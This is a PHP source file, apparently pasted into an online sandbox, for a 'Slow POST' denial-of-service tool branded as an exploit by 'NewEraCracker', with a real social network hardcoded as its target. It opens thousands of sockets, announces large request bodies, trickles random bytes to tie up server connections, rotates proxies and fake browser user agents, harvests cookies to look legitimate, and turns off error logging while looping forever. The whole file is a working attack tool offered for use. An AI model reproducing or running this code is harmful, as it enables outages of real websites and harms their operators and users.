<?php
$_SERVER['argv'][1] = 'http://www.facebook.com/';
//-------------------------
// CONFiG
//-------------------------
$CONFIG['max_cookies'] = 10;
$CONFIG['max_sockets'] = 9001;
$CONFIG['timeout_ms'] = 500;
//-------------------------
// INiT
//-------------------------
// Check PHP Version
if(version_compare(PHP_VERSION, '5.0.4') < 0) { exitWithError('This script only supports PHP 5.0.4 and higher.'); }
// Define exploit version
if(!defined('EXPLOIT_VERSION')) { define('EXPLOIT_VERSION', 'v4.1.3'); }
// Define input stream
if(!defined('STDIN')) { define('STDIN', fopen('php://stdin', 'r')); }
//-------------------------
// FUNCTIONS
//-------------------------
/** Read STDIN and return it */
function readSTDIN($message) {
echo PHP_EOL.$message.' : ';
return trim(fgets(STDIN));
}
/** Exit with error message */
function exitWithError($message) {
echo '[ERROR] '.$message;
exit(1);
}
/** Returns a random useragent */
function randomUserAgent() {
$os1 = mt_rand(5, 6); /* Random major Windows version */
$os2 = mt_rand(0, 2); /* Random minor Windows version */
$ffv = mt_rand(17, 22); /* Random major Firefox version */
return "Mozilla/5.0 (Windows NT {$os1}.{$os2}; rv:{$ffv}.0) Gecko/20100101 Firefox/{$ffv}.0";
}
/** Build stream context or header for connection */
function buildStreamContext($newEraUrl, $newEraProxy, $method='GET', $length='0', $cookie='', $just_header=false)
{
// Init
$proxy = $newEraProxy ? $newEraProxy->full_url : '';
$fulluri = ($newEraProxy && !$newEraUrl->ssl) ? true : false;
$header = '';
// When we return header, set the GET/POST line
if($just_header)
$header .= $method.' '.($fulluri ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n";
// Continue building the header
$header .= 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
if($method == 'POST') {
$header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
$header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : '';
$header .= ($cookie ? "Cookie: {$cookie}\r\n" : '');
$header .= "Content-Length: {$length}\r\n";
}
// When we return header, return it with an extra EOL for termination
if($just_header)
return $header."\r\n";
// Build stream context
$context = stream_context_create(array(
'http' => array(
'method' => $method,
'timeout' => (2),
'header' => $header,
'proxy' => $proxy,
'request_fulluri' => $fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
'ssl' => array(
'verify_peer' => false
)));
return $context;
}
/** Start slowPost */
function slowPostStart($newEraUrl, $newEraProxy, $cookie) {
$obj = ($newEraProxy ? $newEraProxy : $newEraUrl);
$host = ($obj->ssl ? 'ssl://' : 'tcp://').$obj->name;
// Connect
if($socket = @fsockopen($host, $obj->port, $errno, $errstr, 2)) {
// Generate random Content-Length
$length = mt_rand(1337, 133700);
if($newEraProxy && $newEraUrl->ssl) {
// We must enable crypto when using a proxy and url with ssl
$header = 'CONNECT '.$newEraUrl->name.':'.$newEraUrl->port."\r\n";
$header .= 'Host: '.$newEraUrl->name.':'.$newEraUrl->port."\r\n";
$header .= 'Proxy-Connection: Keep-Alive'."\r\n\r\n";
@fwrite($socket, $header);
do { $s = trim(@fread($socket, 8192)); } while($s);
@stream_socket_enable_crypto($socket, true, STREAM_CRYPTO_METHOD_SSLv3_CLIENT);
}
// Send header
if(@fwrite($socket, buildStreamContext($newEraUrl, $newEraProxy, 'POST', $length, $cookie, true))) {
// Set the socket to be asynchronous
stream_set_blocking($socket, 0);
stream_set_timeout($socket, 0, $GLOBALS['CONFIG']['timeout_ms']);
// Return socket and the length remaining
return array('socket' => $socket, 'length' => $length);
}
}
return false;
}
/** Continue slowPost */
function slowPostContinue($socket, $bytes = 5) {
// Sanity check
if(!$socket)
return false;
// Do it
$str = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$str = substr(str_shuffle($str), 0, $bytes);
return @fwrite($socket, $str);
}
//-------------------------
// CLASSES
//-------------------------
/** Class to construct and handle cookie-like object */
class NewEraCookie {
private $max_cookies;
private $cookies = array();
/** Constructor */
public function __construct($newEraUrl, $newEraMultipleProxy) {
$this->update_object($newEraUrl, $newEraMultipleProxy);
}
/** Object updater */
public function update_object($newEraUrl, $newEraMultipleProxy) {
$this->max_cookies = $GLOBALS['CONFIG']['max_cookies'];
$this->cookies = array();
for($i = 0; $i < $this->max_cookies; $i++) {
if($newEraMultipleProxy) {
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraMultipleProxy->fetch());
} else {
$this->cookies[$i] = self::cookieGrab($newEraUrl);
}
}
}
/** Returns a cookie by its index */
public function returnRandomCookie() {
$key = mt_rand(0, $this->max_cookies - 1);
return (isset($this->cookies[$key]) ? $this->cookies[$key] : '');
}
/** Function to parse set-cookie from header fields */
public static function cookieParse($header) {
$cookies = array();
foreach($header as $line) {
if(stripos($line, 'Set-Cookie:') === 0) {
$line = trim(str_ireplace('Set-Cookie:', '', $line));
$csplit = explode(';', $line);
$cdata = array();
$grabbed_cookie_data = false;
foreach($csplit as $data) {
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
if(!$grabbed_cookie_data) {
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$grabbed_cookie_data = true;
continue;
}
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) {
$cdata[$cinfo[0]] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/** Function to build the request cookie header from parsed set-cookie data */
public static function cookieBuild($data) {
if(is_array($data)) {
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/** Function to grab cookies from an url using PHP's fopen */
public static function cookieGrab($newEraUrl, $newEraProxy = null) {
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, buildStreamContext($newEraUrl, $newEraProxy, 'GET'));
// I hope this does work
if($handle) {
// Grab the cookies
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
@fclose($handle);
}
return $cookie;
}
}
/** Class to construct and handle proxy-like object */
class NewEraProxy {
private $proxy_full_url;
private $proxy_name;
private $proxy_port;
/** Constructor */
public function __construct($url) {
$this->update_object($url);
}
/** Object updater */
public function update_object($url) {
if(FALSE !== ($tmp = strpos($url, '://'))) {
$tmp += 3;
$url = substr($url, $tmp);
}
$url = explode(':', $url);
// Proxy: Name, port and full URL
$this->proxy_name = $url[0];
$this->proxy_port = (int)(isset($url[1]) ? $url[1] : '8080');
$this->proxy_full_url = 'tcp://'.$this->proxy_name.':'.$this->proxy_port;
}
/** Getter for the private properties */
public function __get($var) {
$var = 'proxy_'.$var;
if(isset($this->{$var}))
return $this->{$var};
}
}
/** Class to construct and handle url-like object */
class NewEraUrl {
/** MD5 to allow object identification */
private $host_obj_md5;
/** Other parameters */
private $host_full_url;
private $host_protocol;
private $host_ssl;
private $host_name;
private $host_port;
private $host_path;
/** Constructor */
public function __construct($url) {
$this->update_object($url);
}
/** Object updater */
public function update_object($url) {
// Save MD5 identifier and full URL
$this->host_obj_md5 = md5($url);
$this->host_full_url = $url;
// URL: SSL and protocol
$this->host_ssl = (strpos($url, 'https') === 0) ? true : false;
$this->host_protocol = ($this->host_ssl ? 'https' : 'http');
$url = explode('/', $url, 4);
$url[2] = explode(':', $url[2], 2);
// URL: Name, port and path
$this->host_name = $url[2][0];
$this->host_port = (isset($url[2][1]) ? $url[2][1] : ($this->host_ssl ? 443 : 80));
$this->host_path = '/'.(isset($url[3]) ? $url[3] : '');
}
/** Getter for the private properties */
public function __get($var) {
$var = 'host_'.$var;
if(isset($this->{$var}))
{
// Random support
$str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$str = substr(str_shuffle($str), 0, 8);
// Return string with random generated content
return str_replace('%rand%', $str, $this->{$var});
}
}
/** Quick check to see if url is minimally valid */
public static function isValid($url) {
if(strpos($url, 'https://') === 0) {
if(!extension_loaded('openssl')) { exitWithError('OpenSSL extension is not loaded - Unable to access HTTPS URL.'); }
return true;
} else if(strpos($url, 'http://') === 0) {
return true;
}
return false;
}
}
/** Class to construct and handle multiple cookie-like objects */
class NewEraMultipleCookie {
private $newEraCookie_array = array();
public function __construct($newEraMultipleUrl, $newEraMultipleProxy) {
// Reset internal object array pointers
$newEraMultipleUrl->reset();
if($newEraMultipleProxy) {
$newEraMultipleProxy->reset();
}
// Build each cookie object
for($i = 0; $i < $newEraMultipleUrl->number(); $i++) {
$newEraUrl = $newEraMultipleUrl->fetch();
$this->newEraCookie_array[$newEraUrl->obj_md5] = new NewEraCookie($newEraUrl, $newEraMultipleProxy);
}
}
public function fetch($newEraUrl) {
if(isset($this->newEraCookie_array[$newEraUrl->obj_md5])) {
return $this->newEraCookie_array[$newEraUrl->obj_md5];
} else {
// No cookie is defined at all
return null;
}
}
}
/** Class to construct and handle multiple proxy-like objects */
class NewEraMultipleProxy {
private $newEraProxy_array = array();
private $newEraProxy_idx = -1;
public function __construct($arg) {
$grabbed = false;
if($proxy = explode(':', $arg)) {
// Attempt to grab a single proxy
if(isset($proxy[0], $proxy[1])) {
$proxy[1] = (int)$proxy[1];
if(!empty($proxy[1])) {
$grabbed = true;
$this->newEraProxy_array[] = new NewEraProxy($proxy[0].':'.$proxy[1]);
}
}
}
if((!$grabbed) && is_readable($arg)) {
// Build from file
if($content = @file($arg)) {
foreach($content as $proxy) {
$proxy = explode(':', trim($proxy));
if(isset($proxy[0], $proxy[1])) {
$proxy[1] = (int)$proxy[1];
if(!empty($proxy[1])) {
$grabbed = true;
$this->newEraProxy_array[] = new NewEraProxy($proxy[0].':'.$proxy[1]);
}
}
}
} else { exitWithError($arg.' is not a valid proxy-list file!'); }
}
}
public function number() {
return count($this->newEraProxy_array);
}
public function reset() {
$this->newEraProxy_idx = -1;
}
public function fetch() {
$this->newEraProxy_idx++;
if(isset($this->newEraProxy_array[$this->newEraProxy_idx])) {
return $this->newEraProxy_array[$this->newEraProxy_idx];
} else {
$this->newEraProxy_idx = 0;
if(isset($this->newEraProxy_array[$this->newEraProxy_idx])) {
return $this->newEraProxy_array[$this->newEraProxy_idx];
} else {
// No proxy is defined at all
return null;
}
}
}
}
/** Class to construct and handle multiple url-like objects */
class NewEraMultipleUrl {
private $newEraUrl_array = array();
private $newEraUrl_idx = -1;
public function __construct($args) {
$args = explode('|', $args);
foreach($args as $url) {
if(NewEraUrl::isValid($url)) {
$this->newEraUrl_array[] = new NewEraUrl($url);
} else { exitWithError($url.' is not a valid target!'); }
}
}
public function number() {
return count($this->newEraUrl_array);
}
public function reset() {
$this->newEraUrl_idx = -1;
}
public function fetch() {
$this->newEraUrl_idx++;
if(isset($this->newEraUrl_array[$this->newEraUrl_idx])) {
return $this->newEraUrl_array[$this->newEraUrl_idx];
} else {
$this->newEraUrl_idx = 0;
if(isset($this->newEraUrl_array[$this->newEraUrl_idx])) {
return $this->newEraUrl_array[$this->newEraUrl_idx];
} else {
// No URL is defined at all
return null;
}
}
}
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
if(PHP_SAPI != 'cli') {
// Send header if not using CLI PHP
header('Content-Type: text/plain');
}
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
".PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
if(PHP_SAPI != 'cli') {
// Check if input is set if not using CLI PHP
if(!isset($_SERVER['argv'][1]) || !NewEraUrl::isValid($_SERVER['argv'][1])) {
exitWithError('This script is not meant to be ran via browser.');
}
}
// We seem to be running this in a quite good fashion
@set_time_limit(0);
@ini_set('error_log','');
@ini_set('log_errors',0);
@ignore_user_abort(true);
// Fetch the URL to attack and the proxy to use
$url = $proxy = null;
if(isset($_SERVER['argv'][1])) {
$url = $_SERVER['argv'][1];
$proxy = (isset($_SERVER['argv'][2]) ? $_SERVER['argv'][2] : null);
}
// Interactive Run
if(empty($url)) {
// Ask for proxy
do {
switch($tmp = strtolower(substr(readSTDIN('Do you want to use a proxy [yes/no/file]'), 0, 1))) {
case 'n':
break;
case 'y':
$proxy = readSTDIN('Proxy IP');
$proxy .= ':';
$proxy .= (int)(readSTDIN('Proxy port'));
break;
case 'f':
$proxy = readSTDIN('Proxy file');
if(!is_readable($proxy)) {
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$tmp = null;
}
break;
default:
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
$tmp = null;
break;
}
} while(!$tmp);
// Ask for target URL
do {
$url = readSTDIN('Target url');
if(!NewEraUrl::isValid($url)) {
echo PHP_EOL.'Invalid target!'.PHP_EOL;
$url = null;
}
} while(!$url);
}
// Start
$conn = array();
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
$newEraMultipleProxy = (empty($proxy) ? null : (new NewEraMultipleProxy($proxy)));
$newEraMultipleUrl = new NewEraMultipleUrl($url);
$newEraMultipleCookie = new NewEraMultipleCookie($newEraMultipleUrl, $newEraMultipleProxy);
// Do it
while(1) {
for($i = 0; $i < $CONFIG['max_sockets']; $i++) {
$newEraUrl = $newEraMultipleUrl->fetch();
$newEraCookie = $newEraMultipleCookie->fetch($newEraUrl);
$newEraProxy = ($newEraMultipleProxy ? $newEraMultipleProxy->fetch() : null);
// Open a new socket
if($tmp = slowPostStart($newEraUrl, $newEraProxy, $newEraCookie->returnRandomCookie())) {
if(isset($conn[$i], $conn[$i]['socket'])) {
// Close an opened connection
@fclose($conn[$i]['socket']);
unset($conn[$i]);
}
// Save the new connection
$conn[$i] = $tmp;
// Progress bar
echo '.';
}
// Check the current slowPosts
foreach($conn as $k => $v) {
if($conn[$k]['socket'] && ($conn[$k]['length'] > 0)) {
// Contine current
$tmp = ($conn[$k]['length'] < 5) ? $conn[$k]['length'] : 5;
slowPostContinue($conn[$k]['socket'], $tmp);
$conn[$k]['length'] -= $tmp;
} else {
// Close completed
@fclose($conn[$k]['socket']);
unset($conn[$k]);
}
}
}
}
?>
preferences:
37.49 ms | 402 KiB | 5 Q